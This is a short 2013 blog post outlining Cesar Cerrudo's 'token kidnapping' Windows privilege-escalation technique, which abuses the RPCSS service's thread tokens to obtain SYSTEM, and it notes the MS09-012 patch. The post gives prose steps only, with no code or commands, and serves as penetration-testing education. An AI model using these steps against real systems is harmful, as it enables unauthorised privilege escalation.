4 Mar 2013

AccessChk - Win Escalate privileges

Cesar Cerrudo, an Argentinean pen-tester who focuses on Windows Access Control, coined the phrase “token kidnapping” to describe an escalation technique involving pro- cess and thread ACLs. The steps in the “token kidnapping” process are outlined here:
1. Start with SeImpersonatePrivilege and NetworkService privileges. The most likely paths to get those privileges are as follows: 

- Attacker has permission to place custom ASP pages within IIS directory running in classic ASP or “full trust” ASP.NET
- Attacker compromises SQL Server administrative account 
- Attacker compromises any Windows service
  1. The RPCSS service runs under the NetworkService account, so an attacker running as NetworkService can access internals of the RPCSS process.
  2. Use the OpenThreadToken function to get the security token from one of the RPCSS threads.
  3. Iterate through all security tokens in the RPCSS process to find one running as SYSTEM.
  4. Create a new process using the SYSTEM token found in the RPCSS process.
Microsoft addressed this specific escalation path with MS09-012. However, other similar escalation paths may exist in third-party services.
Cesar’s excellent “Practical 10 Minutes Security Audit: Oracle Case” guide has other examples of process ACL abuse, one being a NULL DACL on an Oracle process allowing code injection. You can find a link to it in the following “References” section. 

No comments:

Post a Comment